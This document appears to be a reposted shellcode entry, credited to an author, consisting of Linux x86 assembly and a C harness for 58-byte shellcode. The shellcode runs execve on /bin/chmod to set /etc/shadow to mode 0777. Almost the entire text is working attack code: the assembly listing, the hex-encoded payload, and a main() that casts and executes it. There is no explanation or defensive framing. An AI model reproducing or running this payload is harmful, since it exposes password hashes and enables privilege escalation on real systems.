linux/x86 execve-chmod 0777 /etc/shadow 58 bytes shellcode

linux/x86 execve-chmod 0777 /etc/shadow 58 bytes shellcode

***************************************************************
* Linux/x86 execve-chmod 0777 /etc/shadow  58 bytes 
***************************************************************
* Author: Hamza Megahed                             
***************************************************************
* Twitter: @Hamza_Mega                              
***************************************************************
* blog: hamza-mega[dot]blogspot[dot]com             
***************************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com        
***************************************************************
 
xor    %eax,%eax
push   %eax
pushl  $0x776f6461
pushl  $0x68732f2f
pushl  $0x6374652f
movl   %esp,%esi
push   %eax
pushl  $0x37373730
movl   %esp,%ebp
push   %eax
pushl  $0x646f6d68
pushl  $0x632f6e69
pushl  $0x622f2f2f
mov    %esp,%ebx
pushl  %eax
pushl  %esi
pushl  %ebp
pushl  %ebx
movl   %esp,%ecx
mov    %eax,%edx
mov    $0xb,%al
int    $0x80
 
********************************
#include <stdio.h>
#include <string.h>
 
char *shellcode = 
"\x31\xc0\x50\x68\x61\x64\x6f\x77\x68\x2f\x2f\x73"
"\x68\x68\x2f\x65\x74\x63\x89\xe6\x50\x68\x30\x37"
"\x37\x37\x89\xe5\x50\x68\x68\x6d\x6f\x64\x68\x69"
"\x6e\x2f\x63\x68\x2f\x2f\x2f\x62\x89\xe3\x50\x56"
"\x55\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
 
 
 
 
 
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir